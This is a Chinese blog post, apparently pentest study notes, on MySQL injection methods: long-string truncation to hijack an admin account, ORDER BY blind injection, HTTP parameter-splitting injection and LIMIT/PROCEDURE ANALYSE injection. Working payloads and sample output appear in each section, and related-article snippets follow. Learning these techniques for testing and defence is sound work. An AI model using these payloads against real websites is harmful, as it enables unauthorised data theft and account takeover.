mysql注入之长字符截断、orderby注入、HTTP分割注入、limit注入

最新推荐文章于 2025-04-08 11:22:24 发布
最新推荐文章于 2025-04-08 11:22:24 发布
阅读量6.2k 收藏 4
点赞数
分类专栏: # SQL注入 文章标签: mysql 渗透测试 经验分享 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Thunderclap_/article/details/123079014
版权

长字符截断/SQL约束攻击

  • 产生原因:在mysql中的一个设置里有一个sql_mode选项,当sql_mode设置为default时,即没有开启STRICT_ALL_TABLES选项时(MySQL默认 sql_mode为default),MySQL对插入超长的值只会提示warning,而不是error,这样就会导致一些截断问题。 

例如

  • 一个表的username字段类型为varchar(7) 长度最多7个字符。那么我们插入的时候将字符提高到8字符以上,它只取前7位,并且会弹出warning。

利用漏洞:

  • 假设管理员的登录名为admin,那么我们可以注册一个“admin        ”后面有八个空格用户即可轻易进入后台管理界面。

order by rand(True)   /order by rand(False)盲注

  • 产生原因:原语句类似为$id=$_GET['sort'];     select * from users order by $id ;

  • 利用漏洞:

    • 报错注入?sort=1 and updatexml(1,if(1=1,concat(0x7e,version()),2),1)
    • 盲注 order by rand(True)和order by rand(False)的结果排序是不同的,可以根据这个不同来进行盲注。
  • 例如:
    • 布尔盲注:?sort= rand(database()='ujcms')             
      • 返回了True的排序,说明database()='ujcms'是正确的值

  • 时间盲注 ?sort=if(1=2,1,(SELECT(1)FROM(SELECT(SLEEP(2)))test))
    • 执行结果睡眠2秒

 HTTP分割注入

场景:参数为username&password,查询语句为  select xxx from xxx where username='xxx' and password ='xxx';但是username参数过滤了注释符,无法将后面的注释掉,则可尝试用内联注释把password注释掉,凑成一条新语句后注释或闭合掉后面的语句:

当然这种注入的前提是单引号没有被过滤

  • payload:username=1' or extractvalue /*'&password=1*/ (1,concat(0x7e,(select database()),0x7e))) or'

  • 则查询语句为select * from users where username='1' or extractvalue /*' and password='1*/ (1,concat(0x7e,(select database()),0x7e)) or'';

过滤了空格,union,#,—+,/*,^,or,|

  • 可以考虑将password作为函数的参数来闭合语句:

  • payload:username=admin' and(strcmp(&password=,'asdasdasdasdasdasd')) and '1

  • 则查询语句为select * from users where username='admin' and(strcmp(' and password=','asdasdasdasdasdasd')) and '1';

    • strcmp比较,二者不一致返回True,一致返回False,而MySQL会将’1’判断为数字1,即True,因此该查询语句结果为True

limit注入

一般实际过程中使用 limit 时,大概有两种情况,一种使用order by,一种就是不使用 order by关键字

不存在 order by 关键字

  • 执行语句 select id from users limit 0,1; 

  • 这种情况下的 limit 后面可以使用union进行联合查询注入

  • 执行语句 select id from users limit 0,1 union select username from users;

 

存在 order by 关键字

  • 此方法适用于5.0.0< MySQL <5.6.6版本,在limit语句后面的注入

  • limit 关键字后面还可跟PROCEDURE和 INTO两个关键字,但是 INTO 后面写入文件需要知道绝对路径以及写入shell的权限,因此利用比较难,因此这里以PROCEDURE为例进行注入

  • 使用 PROCEDURE函数进行注入,ANALYSE支持两个参数,首先尝试一下默认两个参数

mysql> select id from users order by id desc limit 0,1 procedure analyse(1,1);

ERROR 1386 (HY000): Can't use ORDER clause with this procedure

  • 报错,尝试一下对其中一个参数进行注入,这里首先尝试报错注入

mysql> select id from users order by id desc limit 0,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);

ERROR 1105 (HY000): XPATH syntax error: ':5.5.53'

  • 不存在回显怎么办,延迟注入呀,如果 select version(); 第一个为5,则多次执行sha(1)达到延迟效果,这里不支持使用 sleep,所以需要使用BENCHMARK进行替代 

mysql> select id from users order by id desc limit 0,1 procedure analyse(extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1)))),1);
ERROR 1105 (HY000): XPATH syntax error: ':0'

MySQL数据库SQL注入靶场sqli通关实战(附靶场安装包)
悦分享
10-20 486
SQL注入是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。带入执行的参数能够可控;拼接的SQL语句能够带入数据库中,并执行;SQL注入攻击是通过操作输入来修改SQL语句,用以达到执行代码对WEB服务器进行攻击的方法。
mysql 查询字段被截断_(SqlServe)关于字符串长度被截断的问题
weixin_29157493的博客
01-19 2242
1. 问题描述在同步数据时常常会发现一个错误:将截断字符串或二进制数据。2. 问题原因这个问题出现的原因是:要插入的数值字段的长度超出了数据库中字段的长度。比如:插入的字符串字节长度是40,数据库中字段长度设置为了varchar(36)就会报此错误。3.问题扩展a. 如何计算字符串长度和字节长度,既:datalength和len区别。len:返回字符串的长度datalength:返回字符串的字节长...
SQL注入(宽字节注入、长字符截断
qq_28786023的博客
10-05 3400
本文仅记录SQL注入漏洞学习过程中的基本知识。 SQL注入漏洞是完全可以避免的安全问题。从其形成原因来看,就是**用户输入的数据(可能带有恶意)被SQL解释器当作代码执行,**从而获得更多数据库的信息或者获得更高的权限。从原理上来说,SQL注入可以分为两大类,数字型注入字符串型注入;(《web安全深度剖析 张炳帅》)。 数字型注入 即输入类型为int类型,如ID,年龄,页码等。一般来说,数字型注入只存在于弱类型语句中,如:PHP,ASP,python,而对于C,java等强类型语言则不存在。弱类型语言会自
MYSQL字符截断
weixin_50464560的博客
03-03 1459
本人freebuf文章:https://www.freebuf.com/vuls/264586.html MYSQL字符截断 即使没有任何注入漏洞,攻击者也可能登录到后台管理页面 1、相关资料 2、sql-mode的各项设置 MySQL5.0以上版本支持三种sql_mode模式:ANSI、TRADITIONAL和STRICT_TRANS_TABLES。 1、ANSI模式:宽松模式,更改语法和行为,使其更符合标准SQL。对插入数据进行校验,如果不符合定义类型或长度,对数据类型调整或截断保存,报warni
利用limit和offset进行sql注入
最新发布
weixin_71228046的博客
04-08 207
不能用GROUP_CONCAT() 所以只能用limit和offset。传入参数,发现只有32以上才有内容,进行sql注入。第二个字段名为username。第三个字段名为password。使用二分法发现只有15条列。第一个字段名为userid。第6条没有只有5条数据。发现第8个才是用户表。
超长字符截断注入
aiquan9342的博客
02-11 285
注入方法也是昨天看到某技术交流群聊到,闻所未闻便想要学习了,今天看某微信公众号的时候又再次看到关于”长字符截断注入“的文章. 但是经过一番了解,其实这个注入姿势很难找到了,因为它需要满足以下条件。   1.可以注册用户,而且可以注册带有空格的用户   2.你需要知道管理员的账号 看下面CODE mysql> create table test( -&...
利用mysql对特殊字符和超长字符会进行截断的特性 进行存储型XSS攻击——WordPress <4.1.2 & <=4.2 存储型xss...
weixin_34144848的博客
07-31 396
转自:Baidu Security Lab Xteam http://xteam.baidu.com/?p=177 漏洞概述 本次漏洞出现两个使用不同方式截断来实现的存储型xss,一种为特殊字符截断,一种为数据库字段长度截断,该漏洞导致攻击者可获取用户 cookie以及模拟浏览器正常操作,并且当管理员访问到注入的payload时,结合wordpress后台功能甚至可以getshell。   ...
截断注入
gl620321的博客
08-11 1264
一、截断注入 1.SQL攻击(SQL injection),简称注入攻击,是发生于应用程序之间数据库层的安全漏洞。 2.简而言之,是在输入的字符串之中注入SQL指令,在设计不良的程序之中忽略了检查,那么这些注入进去的指令就会被数据库服务器误认为是正常的SQL指令而运行,因此遭到破坏。 因为字符注入一般都带有单引号(‘),构造诸如攻击需要闭合单引号 或者双条件查询的情况下转义一个单引号,这个时候就...
mysql sql注入漏洞修复_SQL注入漏洞解析与靶场复现
weixin_36043375的博客
02-26 1451
1. 概述SQL注入(SQL Injectioin)漏洞是注入漏洞中危害性最高的漏洞之一。形成的原因主要是在数据交互过程中,前端的数据传入后端时,没有作严格的验证过滤导致传入的“数据”拼接到了SQL语句中。被数据库当作SQL语句的一部分执行,从而使得数据面临被脱库、恶意破坏篡改甚至造成整个系统权限沦陷等一系列危害。注入攻击的本质是把用户输入的数据当作代码执行。造成注入攻击有两个关键条件:①用户能够...
原理+实战掌握SQL注入方法
Lemon's blog
11-19 1338
前言: SQL注入web安全中最常见的攻击方式,SQL注入有很多姿势,但如果只知道payload,不知道原理,感觉也很难掌握,这次就总结一下我所遇到的SQL注入姿势,原理分析+题目实战。 0x00 Xpath报错注入 涉及函数 updatexml():对xml进行查询和修改 extractvalue():对xml进行查询和修改 报错语句构造 select extractvalue(1,conca...
Mysql】第六章 表增删改查(insert+duplicate+replace+select+distinct+where+order by+limit+update+delete+truncat
YQ20210216的博客
08-06 1041
/这在select后出现的列,在group by中也要出现,意思是被group by分组后的列,才能在select中打印。:group by的插入位置,执行顺序,where、group by、select、order by、limit查询工资高于500或岗位为MANAGER的雇员,同时还要满足他们的姓名首字母为大写的J。,分组之后再过滤行数大于1的,就表示同一个名字至少有2条记录,重复了。筛选等于null的数据,筛选等于null的数据,用。筛选不等于null的数据,筛选不等于null的数据。
如何修改Mysql中group_concat的长度限制
09-09
MySQL数据库中,`GROUP_CONCAT` 函数是一个非常实用的工具,它允许你在聚合查询中将多个行的某个列值合并成一个单一的字符串,每个值之间由默认的逗号分隔。然而,当你处理大量数据时,可能会遇到一个限制,即`...
通过 HTTP 头进行 SQL 注入
xiaoshan812613234的专栏
08-14 755
在漏洞评估和渗透测试中,确定目标应用程序的输入向量是第一步。这篇文章解释了别人是如何通过HTTP头部对你的数据库进行SQL注入攻击的,以及讨论下选择哪种漏洞扫描器测试SQL注入。 在漏洞评估和渗透测试中,确定目标应用程序的输入向量是第一步。有时,当做web应用程序测试时,SQL注入漏洞的测试用例通常局限于特殊的输入向量GET和POST变量。那么对于其他的HTTP头部参数呢?难道他们不是潜在的SQ
数据库应用常见问题——MySQL字符串截取
jinxlzc的博客
04-11 552
在很多时候数据库的表中的某一字段会存有多个信息,有的是按照指定的分隔符隔开,有的是按照不同的位置进行划分,那么有的时候就不得不将该字段的每条记录做选择性截取或是分割成多个字段,这一步骤可以在业务逻辑层中完成,也使用SQL存储过程里完成,这里我要说的就是存储过程中的字符串截取 先准备如下的数据表以备实验: 1.左右截取 1.1left(str, length) 截取字符串从左起的n位,比...
字符注入
m0_37923208的博客
09-26 437
字符注入gbk是一种多字符编码,通常来说,一个gbk编码汉字,占用2个字节。一个utf-8编码的汉字,占用3个字节。PHP在开启magic_quotes_gpc或者使用addslashes、iconv等函数的时候,单引号(’)会被转义成\’。比如字符%bf在满足上述条件的情况下会变成%bf\’。其中反斜杠(\)的十六进制编码是%5C,单引号(’)的十六进制编码是%27,那么就可以得出%bf \’=
mysql注入limit 注入
Sp4rkW的博客
03-05 4731
limit注入基本常见的分两种场景,存在`order by`与否,本文将复现尝试各种limit注入的姿势与讨论不同mysql版本对注入payload的影响。作者能力有限,有更多思路欢迎讨论~
sql注入
frutrue的博客
10-26 1054
简单的sql注入笔记: 一、sql注入 sql注入(sql injection)被称为sql数据库结构化查询,是由于程序员在编写代码时的不严谨所造成的漏洞,它能让外部人员通过sql语句,查询到数据库的重要内容,容易造成数据泄露,隐私文件被读取,财产损失等。 sql注入条件: 1.参数用户可控:前端传给后端的参数用户可控。 2.参数带入数据库查询:传入的参数拼接到SQL语句中,且带入数据库中查询 只要存在着两个条件,就有可能产生sql注入漏洞。现在市面上的数据库类型有Access,mysql,mssql,P
sql-lab关于limit注入(网络信息安全实验室 第四题)
weixin_43803070的博客
04-27 2069
关于limit注入(记一次sql注入) 1.函数解释 MySQL 5.1.5版本中添加了对XML文档进行查询和修改的函数,分别是ExtractValue()和UpdateXML() 1)extractvalue():从目标XML中返回包含所查询值的字符串。   EXTRACTVALUE (XML_document, XPath_string);   第一个参数:XML_document是Str...
网络安全进阶学习第十课——MySQL手工注入
p36273的博客
08-02 2574
多了一列选项,由于正确就会执行sleep(1),所以相应时间最长的那一个就是正确的结果,这里就是14。这样就知道security这个数据库里面所有的表名字:emails,referers,uagents,users。现在这样子就知道了users这个表的所有字段名,假设知道了字段是:id,username,password。好了这样就知道所有的表名字是:emails,referers,uagents,users。,这个函数第二个参数要是有特殊字符是会报错的,这里0x7e是“~”的URL编码。
mysql存储过程怎么确定字段长度
03-12
<think>好的,用户的问题是关于如何在MySQL存储过程中定义或检查字段长度。首先,我需要回忆一下存储过程的基本结构和相关语法。存储过程允许封装SQL语句,但字段的定义通常是在表结构中,而不是在存储过程中直接定义。不过用户可能想知道如何在存储过程中处理字段长度的限制,比如在插入数据前验证长度是否符合要求。 接下来,我需要考虑如何检查字段长度。在存储过程中,可以使用LENGTH()或CHAR_LENGTH()函数来获取字符串的长度,然后与字段定义的最大长度进行比较。例如,如果字段是VARCHAR(50),那么在插入前检查输入字符串的长度是否超过50,超过的话可以抛出错误或截断。 然后,关于定义字段长度,这通常在创建或修改表结构时完成,而不是在存储过程中。存储过程本身不定义字段,但可以在其中执行ALTER TABLE语句来修改字段长度。不过用户可能需要了解如何在存储过程中动态获取字段的长度限制,比如通过查询information_schema数据库中的COLUMNS表,获取特定字段的CHARACTER_MAXIMUM_LENGTH属性。 还需要考虑用户提供的引用内容。引用[1]提到超出范围的数字会被截断,而字符串可能被截断或导致错误。引用[3]提到了各类型字段的最大宽度,比如VARCHAR的最大长度是65535字节,但实际可用长度受行大小限制。这可能涉及到存储过程中如何处理超过长度的情况,比如截断或报错。 用户可能的应用场景包括数据校验、动态生成SQL语句,或者在数据处理时确保符合字段长度限制。需要给出具体的步骤,例如使用DECLARE定义变量,使用IF语句进行条件判断,使用SIGNAL语句抛出错误,或者使用SUBSTRING截断字符串。 另外,需要注意存储过程中处理字符串长度时,字符集的影响,比如UTF-8字符可能占用多个字节,所以LENGTH()返回字节数,而CHAR_LENGTH()返回字符数。如果字段是VARCHAR(50) CHARSET utf8,那么实际字节限制是150(每个字符最多3字节),但定义时VARCHAR(50)指的是50个字符,实际存储占用根据字符不同而变化。这可能影响如何正确判断长度是否超出限制。 可能还需要示例代码来演示如何在存储过程中实现这些检查。例如,在插入前检查输入值的长度,如果超过则截断或报错。同时,如何从information_schema中查询字段的最大长度,以便动态获取限制值,而不是硬编码在存储过程中。 总结一下,回答需要分两部分:定义字段长度和检查字段长度。定义通常在表结构,检查可以在存储过程中使用函数和条件判断。需要引用提供的参考资料中的内容,比如自动截断或修改为0的情况,以及字段类型的最大宽度限制。</think>在MySQL存储过程中,定义和检查字段长度需要结合表结构设计、数据类型选择和过程控制逻辑。以下是具体实现方法: ### 一、字段长度定义规范 1. **表结构定义阶段** 字段长度在创建表时通过数据类型声明: ```sql CREATE TABLE users ( username VARCHAR(50) -- 定义最大字符长度 ); ``` VARCHAR类型最大支持$65535$字节(实际可用$65532$字节),但受行大小限制[^3] 2. **动态获取字段长度** 通过查询`information_schema`获取元数据: ```sql SELECT COLUMN_NAME, CHARACTER_MAXIMUM_LENGTH FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA = 'your_db' AND TABLE_NAME = 'your_table'; ``` ### 二、存储过程中的长度检查 1. **插入前验证** ```sql DELIMITER $$ CREATE PROCEDURE validate_input(IN input_val VARCHAR(255)) BEGIN IF CHAR_LENGTH(input_val) > 50 THEN SIGNAL SQLSTATE '45000' SET MESSAGE_TEXT = '输入值超过字段最大长度'; END IF; -- 截断处理示例 SET @safe_val = SUBSTRING(input_val, 1, 50); INSERT INTO users(username) VALUES(@safe_val); END$$ DELIMITER ; ``` 2. **自动截断机制** 当插入值超过定义长度时,MySQL会根据字段类型自动处理: - VARCHAR类型:截断超出部分并生成警告 - 数值类型:存储为最接近的边界值[^1] ### 三、特殊场景处理 1. **日期+流水号生成** 结合日期和序列号的组合字段时,需计算总长度: ```sql SELECT CONCAT( DATE_FORMAT(NOW(), '%Y%m%d'), LPAD( IFNULL( (SELECT SUBSTRING(orderNo,9) FROM orders WHERE SUBSTRING(orderNo,1,8)=DATE_FORMAT(NOW(),'%Y%m%d') ORDER BY id DESC LIMIT 1), 0 ) + 1, 6, '0' ) ) AS newOrderNo; ``` 此方法确保总长度=8位日期+6位序列=14字符[^2] 2. **二进制字段处理** BLOB/VARBINARY类型的长度限制: ```sql CREATE TABLE files ( file_data VARBINARY(65532) -- 接近最大行大小限制 ); ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Thunderclap_

点赞、关注加收藏~

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值